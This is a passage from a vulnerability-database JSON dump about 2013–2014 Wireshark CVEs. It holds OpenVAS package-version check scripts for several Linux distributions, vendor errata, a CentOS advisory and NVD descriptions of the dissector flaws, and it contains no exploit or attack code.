\"CVE-2013-7112\", \"CVE-2013-6337\", \"CVE-2013-6336\", \"CVE-2013-7114\", \"CVE-2014-2299\", \"CVE-2013-6340\", \"CVE-2014-2281\", \"CVE-2014-2283\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.8.10~7.13.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~1.8.10~7.13.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.8.10~7.13.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:46", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-04-03T00:00:00", "id": "OPENVAS:1361412562310881913", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881913", "title": "CentOS Update for wireshark CESA-2014:0342 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for wireshark CESA-2014:0342 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881913\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-03 11:55:23 +0530 (Thu, 03 Apr 2014)\");\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\",\n \"CVE-2013-6340\", \"CVE-2013-7112\", \"CVE-2013-7114\", \"CVE-2014-2281\",\n \"CVE-2014-2283\", \"CVE-2014-2299\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for wireshark CESA-2014:0342 centos6\");\n\n script_tag(name:\"affected\", value:\"wireshark on CentOS 6\");\n script_tag(name:\"insight\", value:\"Wireshark is a network protocol analyzer. It is used to\ncapture and browse the traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off\na network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2014-2281,\nCVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338,\nCVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0342\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-March/020238.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.8.10~7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~1.8.10~7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.8.10~7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:48:51", "bulletinFamily": "scanner", "description": "Check for the Version of wireshark", "modified": "2017-07-10T00:00:00", "published": "2014-04-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881913", "id": "OPENVAS:881913", "title": "CentOS Update for wireshark CESA-2014:0342 centos6 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for wireshark CESA-2014:0342 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(881913);\n script_version(\"$Revision: 6656 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:49:38 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-03 11:55:23 +0530 (Thu, 03 Apr 2014)\");\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\",\n \"CVE-2013-6340\", \"CVE-2013-7112\", \"CVE-2013-7114\", \"CVE-2014-2281\",\n \"CVE-2014-2283\", \"CVE-2014-2299\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for wireshark CESA-2014:0342 centos6 \");\n\n tag_insight = \"Wireshark is a network protocol analyzer. It is used to\ncapture and browse the traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off\na network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2014-2281,\nCVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338,\nCVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n\";\n\n tag_affected = \"wireshark on CentOS 6\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"CESA\", value: \"2014:0342\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2014-March/020238.html\");\n script_summary(\"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.8.10~7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~1.8.10~7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.8.10~7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-04-03T00:00:00", "id": "OPENVAS:1361412562310871149", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871149", "title": "RedHat Update for wireshark RHSA-2014:0342-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for wireshark RHSA-2014:0342-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871149\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-03 13:06:12 +0530 (Thu, 03 Apr 2014)\");\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\",\n \"CVE-2013-6340\", \"CVE-2013-7112\", \"CVE-2013-7114\", \"CVE-2014-2281\",\n \"CVE-2014-2283\", \"CVE-2014-2299\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for wireshark RHSA-2014:0342-01\");\n\n\n script_tag(name:\"affected\", value:\"wireshark on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"Wireshark is a network protocol analyzer. It is used to capture and browse\nthe traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off\na network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2014-2281,\nCVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338,\nCVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0342-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-March/msg00039.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.8.10~7.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.8.10~7.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.8.10~7.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:25", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-11-08T00:00:00", "id": "OPENVAS:1361412562310867039", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867039", "title": "Fedora Update for wireshark FEDORA-2013-20829", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2013-20829\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867039\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-08 10:28:58 +0530 (Fri, 08 Nov 2013)\");\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for wireshark FEDORA-2013-20829\");\n\n\n script_tag(name:\"affected\", value:\"wireshark on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-20829\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-November/120218.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.10.3~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:04", "bulletinFamily": "unix", "description": "[1.8.10-7.0.1.el6]\n- Add oracle-ocfs2-network.patch to allow disassembly of OCFS2 interconnect\n[1.8.10-7]\n- security patches\n- Resolves: CVE-2013-6337\n[1.8.10-6]\n- security patches\n- Resolves: CVE-2014-2281\n CVE-2014-2283\n CVE-2014-2299\n[1.8.10-5]\n- security patches\n- Resolves: CVE-2013-6336\n CVE-2013-6338\n CVE-2013-6339\n CVE-2013-6340\n CVE-2013-7112\n CVE-2013-7114", "modified": "2014-03-31T00:00:00", "published": "2014-03-31T00:00:00", "id": "ELSA-2014-0342", "href": "http://linux.oracle.com/errata/ELSA-2014-0342.html", "title": "wireshark security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:21", "bulletinFamily": "unix", "description": "[1.0.15-6.0.1.el5]\n- Added oracle-ocfs2-network.patch\n- increase max packet size to 65536 (Herbert van den Bergh) [orabug 13542633]\n[1.0.15-6]\n- security patches\n- Resolves: CVE-2012-6056\n CVE-2012-6060\n CVE-2012-6061\n CVE-2012-6062\n CVE-2013-3557\n CVE-2013-3559\n CVE-2013-4081\n CVE-2013-4083\n CVE-2013-4927\n CVE-2013-4931\n CVE-2013-4932\n CVE-2013-4933\n CVE-2013-4934\n CVE-2013-4935\n CVE-2013-5721\n CVE-2013-7112\n CVE-2014-2281\n CVE-2014-2299", "modified": "2014-03-31T00:00:00", "published": "2014-03-31T00:00:00", "id": "ELSA-2014-0341", "href": "http://linux.oracle.com/errata/ELSA-2014-0341.html", "title": "wireshark security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2019-05-29T17:22:36", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark. ([CVE-2014-2281 __](<https://access.redhat.com/security/cve/CVE-2014-2281>), [CVE-2014-2299 __](<https://access.redhat.com/security/cve/CVE-2014-2299>))\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file. ([CVE-2013-6336 __](<https://access.redhat.com/security/cve/CVE-2013-6336>), [CVE-2013-6337 __](<https://access.redhat.com/security/cve/CVE-2013-6337>), [CVE-2013-6338 __](<https://access.redhat.com/security/cve/CVE-2013-6338>), [CVE-2013-6339 __](<https://access.redhat.com/security/cve/CVE-2013-6339>), [CVE-2013-6340 __](<https://access.redhat.com/security/cve/CVE-2013-6340>), [CVE-2014-2283 __](<https://access.redhat.com/security/cve/CVE-2014-2283>), [CVE-2013-7112 __](<https://access.redhat.com/security/cve/CVE-2013-7112>), [CVE-2013-7114 __](<https://access.redhat.com/security/cve/CVE-2013-7114>))\n\n \n**Affected Packages:** \n\n\nwireshark\n\n \n**Issue Correction:** \nRun _yum update wireshark_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n wireshark-1.8.10-7.13.amzn1.i686 \n wireshark-devel-1.8.10-7.13.amzn1.i686 \n wireshark-debuginfo-1.8.10-7.13.amzn1.i686 \n \n src: \n wireshark-1.8.10-7.13.amzn1.src \n \n x86_64: \n wireshark-1.8.10-7.13.amzn1.x86_64 \n wireshark-devel-1.8.10-7.13.amzn1.x86_64 \n wireshark-debuginfo-1.8.10-7.13.amzn1.x86_64 \n \n \n", "modified": "2014-09-18T00:29:00", "published": "2014-09-18T00:29:00", "id": "ALAS-2014-330", "href": "https://alas.aws.amazon.com/ALAS-2014-330.html", "title": "Medium: wireshark", "type": "amazon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:29:34", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2014:0342\n\n\nWireshark is a network protocol analyzer. It is used to capture and browse\nthe traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed packet off\na network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2014-2281,\nCVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2013-6336, CVE-2013-6337, CVE-2013-6338,\nCVE-2013-6339, CVE-2013-6340, CVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-March/032276.html\n\n**Affected packages:**\nwireshark\nwireshark-devel\nwireshark-gnome\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0342.html", "modified": "2014-03-31T18:13:23", "published": "2014-03-31T18:13:23", "href": "http://lists.centos.org/pipermail/centos-announce/2014-March/032276.html", "id": "CESA-2014:0342", "title": "wireshark security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:13:06", "bulletinFamily": "NVD", "description": "The ieee802154_map_rec function in epan/dissectors/packet-ieee802154.c in the IEEE 802.15.4 dissector in Wireshark 1.8.x before 1.8.11 and 1.10.x before 1.10.3 uses an incorrect pointer chain, which allows remote attackers to cause a denial of service (application crash) via a crafted packet.", "modified": "2017-09-19T01:36:00", "id": "CVE-2013-6336", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6336", "published": "2013-11-04T16:55:00", "title": "CVE-2013-6336", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:07", "bulletinFamily": "NVD", "description": "Multiple buffer overflows in the create_ntlmssp_v2_key function in epan/dissectors/packet-ntlmssp.c in the NTLMSSP v2 dissector in Wireshark 1.8.x before 1.8.12 and 1.10.x before 1.10.4 allow remote attackers to cause a denial of service (application crash) via a long domain name in a packet.", "modified": "2014-04-19T04:45:00", "id": "CVE-2013-7114", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7114", "published": "2013-12-19T22:55:00", "title": "CVE-2013-7114", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:06", "bulletinFamily": "NVD", "description": "The dissect_openwire_type function in epan/dissectors/packet-openwire.c in the OpenWire dissector in Wireshark 1.8.x before 1.8.11 and 1.10.x before 1.10.3 allows remote attackers to cause a denial of service (loop) via a crafted packet.", "modified": "2017-09-19T01:36:00", "id": "CVE-2013-6339", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6339", "published": "2013-11-04T16:55:00", "title": "CVE-2013-6339", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:06", "bulletinFamily": "NVD", "description": "The dissect_sip_common function in epan/dissectors/packet-sip.c in the SIP dissector in Wireshark 1.8.x before 1.8.11 and 1.10.x before 1.10.3 does not properly initialize a data structure, which allows remote attackers to cause a denial of service (application crash) via a crafted packet.", "modified": "2017-09-19T01:36:00", "id": "CVE-2013-6338", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6338", "published": "2013-11-04T16:55:00", "title": "CVE-2013-6338", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:06", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the NBAP dissector in Wireshark 1.8.x before 1.8.11 and 1.10.x before 1.10.3 allows remote attackers to cause a denial of service (application crash) via a crafted packet.", "modified": "2017-09-19T01:36:00", "id": "CVE-2013-6337", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6337", "published": "2013-11-04T16:55:00", "title": "CVE-2013-6337", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:44", "bulletinFamily": "NVD", "description": "The nfs_name_snoop_add_name function in epan/dissectors/packet-nfs.c in the NFS dissector in Wireshark 1.8.x before 1.8.13 and 1.10.x before 1.10.6 does not validate a certain length value, which allows remote attackers to cause a denial of service (memory corruption and application crash) via a crafted NFS packet.", "modified": "2015-08-12T17:42:00", "id": "CVE-2014-2281", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2281", "published": "2014-03-11T13:01:00", "title": "CVE-2014-2281", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:07", "bulletinFamily": "NVD", "description": "The dissect_sip_common function in epan/dissectors/packet-sip.c in the SIP dissector in Wireshark 1.8.x before 1.8.12 and 1.10.x before 1.10.4 does not check for empty lines, which allows remote attackers to cause a denial of service (infinite loop) via a crafted packet.", "modified": "2014-04-19T04:45:00", "id": "CVE-2013-7112", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7112", "published": "2013-12-19T22:55:00", "title": "CVE-2013-7112", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:06", "bulletinFamily": "NVD", "description": "epan/dissectors/packet-tcp.c in the TCP dissector in Wireshark 1.8.x before 1.8.11 and 1.10.x before 1.10.3 does not properly determine the amount of remaining data, which allows remote attackers to cause a denial of service (application crash) via a crafted packet.", "modified": "2017-09-19T01:36:00", "id": "CVE-2013-6340", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6340", "published": "2013-11-04T16:55:00", "title": "CVE-2013-6340", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:44", "bulletinFamily": "NVD", "description": "Buffer overflow in the mpeg_read function in wiretap/mpeg.c in the MPEG parser in Wireshark 1.8.x before 1.8.13 and 1.10.x before 1.10.6 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a large record in MPEG data.", "modified": "2016-06-02T02:25:00", "id": "CVE-2014-2299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2299", "published": "2014-03-11T13:01:00", "title": "CVE-2014-2299", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:13:44", 